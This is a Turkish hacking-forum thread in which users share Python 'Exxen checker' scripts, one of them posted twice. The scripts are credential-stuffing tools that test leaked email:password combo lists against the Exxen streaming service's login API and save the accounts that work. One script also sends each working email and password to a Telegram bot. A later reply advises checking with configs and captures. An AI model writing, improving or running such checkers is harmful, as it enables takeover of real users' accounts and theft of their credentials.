Api Çalışıp Çalışmadığını anlama hk

Pissoqula

guns.lol/pissoqula
Diamond Üye
Katılım
3 Mar 2024
Mesajlar
402
Beğeniler
32
bi apinin çalışıp çalışmadığını neyle anlayabilirim acaba ( )
 
Bu kullanıcıyla herhangi bir iş veya ticaret yapmak istiyorsanız, forumdan uzaklaştırıldığını sakın unutmayın.
hayır hazır toolda api buldum çalışıp çalışmadığını nerden anlayacam yada genel olarak apilerin çalışıp çalışmadıklarını gösteren birşey varmı site vs?


eğer api şeyini anlarsam belki yapmaya çalışırım
toolun adını verir misin? yada paylaşabilirmisin
 
exxen checker istiyosan atıyım açık kodlu incelersin
çalışıyorsa atsana kral

toolun adını verir misin? yada paylaşabilirmisin
tgde paylaşılmış bir tool
import requests
import time
import os
import uuid
from colorama import Fore, Style

def clear():
os.system('clear')


def generate_guid():
return str(uuid.uuid4())


# Collect input from the user
combo = input(Fore.YELLOW + '📂 Combo Dosyasının Yolunu Giriniz >>> ' + Style.RESET_ALL)
tok = (Fore.WHITE + 'TOKEN' + Style.RESET_ALL)
ID = (Fore.GREEN + 'İD' + Style.RESET_ALL)
clear()

print(Fore.GREEN + '⚙️ ' + Fore.YELLOW +
'\n╔══════════════════════════════════' +
'\n╚══════════════════════════════════' +
'\n🔎 <EXXEN CHECKER>' + Style.RESET_ALL)

# Function to check the credentials
def check(email, password):
client = requests.session()
headers = {
'Host': 'api-crm.exxen.com',
'Origin': 'com.exxen.ios',
'Content-Type': 'application/x-www-form-urlencoded; charset=utf-8',
'Accept': '*/*',
'Accept-Encoding': 'gzip, deflate',
'User-Agent': 'Exxen/1.0.23 (com.exxen.ios; build:5; iOS 15.5.0) Alamofire/5.4.4',
'Accept-Language': 'tr-TR;q=1.0',
'Cache-Control': 'no-cache',
'Connection': 'close'
}
data = {
'Email': email,
'Password': password,
'RememberMe': 'true'
}
try:
response = client.post(
' ',
data=data,
headers=headers
)
time.sleep(1)

theos = f'''\n🔹 @
-------------------------------------
🔑 EXXEN HİT DÜŞTÜ
📧 Gmail: {email}
🔒 Pass: {password}
👤 Owner: @
📢 Channel: @
---------------------------------------------
@/ @'''

tlg = f' {tok}/sendMessage?chat_id={ID}&text={theos}'

if 'Success":false' in response.text:
print(Fore.RED + f'❌ Başarısız: {email}:{password}' + Style.RESET_ALL)
elif 'Success":true' in response.text:
print(Fore.YELLOW + f'✅ Hits: {email}:{password}' + Style.RESET_ALL)
with open('C:/Users/PC/Desktop/gng/EmrHit.txt', 'a') as filee:
filee.write(theos)
requests.post(tlg)
else:
print(Fore.RED + f'⚠️ Hata : {response.text}' + Style.RESET_ALL)
except requests.RequestException as e:
print(Fore.RED + f'🚨 Hata : {e}' + Style.RESET_ALL)

try:
with open(combo, 'r', encoding='utf-8') as file: # 'utf-8' kodlamasını ekledim
for line in file:
seq = line.strip()
acc = seq.split(':')
if len(acc) == 2:
check(acc[0], acc[1])
else:
print(Fore.RED + f'🚫 Bilinmeyen Format: {line}' + Style.RESET_ALL)
except FileNotFoundError:
print(Fore.RED + '📂 Combo Dosyası Bulunamadı!' + Style.RESET_ALL)
except UnicodeDecodeError as e:
print(Fore.RED + f'🚨 Unicode Decode Error: {e}' + Style.RESET_ALL)
reklam olabilcek yerleri kaldırdım
 
çalışıyorsa atsana kral


tgde paylaşılmış bir tool

reklam olabilcek yerleri kaldırdım
import requests, base64, time
import requests, json, time
from cfonts import render
T, H, Z, Q, X = '\033[1;32m', '\033[1;36m', '\033[1;31m', '\033[1;36m', '\033[1;33m'
exxen_hit_tho = "t5omas_exxen_hit.txt"

output = render('EXXEN', colors=['white', 'blue'], align='center')
print("\x1b[1;39m—" * 60)
print(output)
print("\x1b[1;39m—" * 60)
print("~ Programmer :TG @T5OMAS")
print("\x1b[1;39m—" * 60)

def exxo(username, password):
user_pass = base64.b64encode(f"{username}:{password}".encode()).decode()
login_url = " "
login_headers = {
"accept": "application/json,text/plain,*/*", "accept-encoding": "gzip,deflate,br,zstd", "accept-language": "tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7",
"authorization": f"Basic {user_pass}", "content-type": "application/json", "origin": " ", "referer": " ",
"sec-ch-ua": "\"Google Chrome\";v=\"131\",\"Chromium\";v=\"131\",\"Not_A Brand\";v=\"24\"", "sec-ch-ua-mobile": "?0", "sec-ch-ua-platform": "\"Windows\"",
"user-agent": "Mozilla/5.0(Windows NT 10.0;Win64;x64)AppleWebKit/537.36(KHTML,like Gecko)Chrome/131.0.0.0Safari/537.36"
}
login_payload = {"deviceDetails": {"deviceName": "Chrome", "deviceType": "Desktop", "modelNo": "131.0.0.0", "serialNo": "131.0.0.0", "brand": "Chrome", "os": "Windows", "osVersion": "10"}}
try:
response = requests.post(login_url, headers=login_headers, json=login_payload, timeout=10)
if response.status_code == 200 and response.json().get("bearer", {}).get("auth", {}).get("token"):
return True
except requests.exceptions.RequestException as e:
print(f"ban ..")
time.sleep(2)
return False

def thomas(combo):
with open(combo, "r") as file:
for line in file:
username, password = line.strip().split(":")
if exxo(username, password):
with open(exxen_hit_tho, "a") as hit:
hit.write(f"{username}:{password}\n")
print("\x1b[1;39m—" * 60)
print(f"Giriş başarılı✅: {username}:{password}")
else:

print(f"Giriş başarısız❌: {username}:{password}")
print("\x1b[1;39m—" * 60)

combo = input(" ~ Combo: ")
thomas(combo)
 
Bu kullanıcıyla herhangi bir iş veya ticaret yapmak istiyorsanız, forumdan uzaklaştırıldığını sakın unutmayın.
import requests, base64, time
import requests, json, time
from cfonts import render
T, H, Z, Q, X = '\033[1;32m', '\033[1;36m', '\033[1;31m', '\033[1;36m', '\033[1;33m'
exxen_hit_tho = "t5omas_exxen_hit.txt"

output = render('EXXEN', colors=['white', 'blue'], align='center')
print("\x1b[1;39m—" * 60)
print(output)
print("\x1b[1;39m—" * 60)
print("~ Programmer :TG @T5OMAS")
print("\x1b[1;39m—" * 60)

def exxo(username, password):
user_pass = base64.b64encode(f"{username}:{password}".encode()).decode()
login_url = " "
login_headers = {
"accept": "application/json,text/plain,*/*", "accept-encoding": "gzip,deflate,br,zstd", "accept-language": "tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7",
"authorization": f"Basic {user_pass}", "content-type": "application/json", "origin": " ", "referer": " ",
"sec-ch-ua": "\"Google Chrome\";v=\"131\",\"Chromium\";v=\"131\",\"Not_A Brand\";v=\"24\"", "sec-ch-ua-mobile": "?0", "sec-ch-ua-platform": "\"Windows\"",
"user-agent": "Mozilla/5.0(Windows NT 10.0;Win64;x64)AppleWebKit/537.36(KHTML,like Gecko)Chrome/131.0.0.0Safari/537.36"
}
login_payload = {"deviceDetails": {"deviceName": "Chrome", "deviceType": "Desktop", "modelNo": "131.0.0.0", "serialNo": "131.0.0.0", "brand": "Chrome", "os": "Windows", "osVersion": "10"}}
try:
response = requests.post(login_url, headers=login_headers, json=login_payload, timeout=10)
if response.status_code == 200 and response.json().get("bearer", {}).get("auth", {}).get("token"):
return True
except requests.exceptions.RequestException as e:
print(f"ban ..")
time.sleep(2)
return False

def thomas(combo):
with open(combo, "r") as file:
for line in file:
username, password = line.strip().split(":")
if exxo(username, password):
with open(exxen_hit_tho, "a") as hit:
hit.write(f"{username}:{password}\n")
print("\x1b[1;39m—" * 60)
print(f"Giriş başarılı✅: {username}:{password}")
else:

print(f"Giriş başarısız❌: {username}:{password}")
print("\x1b[1;39m—" * 60)

combo = input(" ~ Combo: ")
thomas(combo)
bununla 2 saat proxysiz ugrasacaginiza config ile captureli checkleyebilirsiniz
 

  Şuanda konuyu görüntüleyen kullanıcılar


Üst Alt